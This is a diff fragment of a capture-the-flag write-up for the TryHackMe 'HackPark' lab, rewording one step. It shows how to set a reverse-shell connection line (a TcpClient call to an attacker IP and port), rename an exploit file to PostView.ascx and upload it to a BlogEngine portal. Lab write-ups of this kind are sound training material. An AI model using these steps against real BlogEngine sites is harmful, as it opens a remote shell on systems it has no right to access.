cya-nyde/CTF-Writeups/THM/hackpark.md

 ### Who is the webserver running as?

-- First, set the reverse shell IP in the exploit code
+- Set the reverse shell IP in the exploit code
     - Edit this line: `System.Net.Sockets.TcpClient("10.10.10.20", 4445))`
 - Rename the file to PostView.ascx
 - Upload to blogengine portal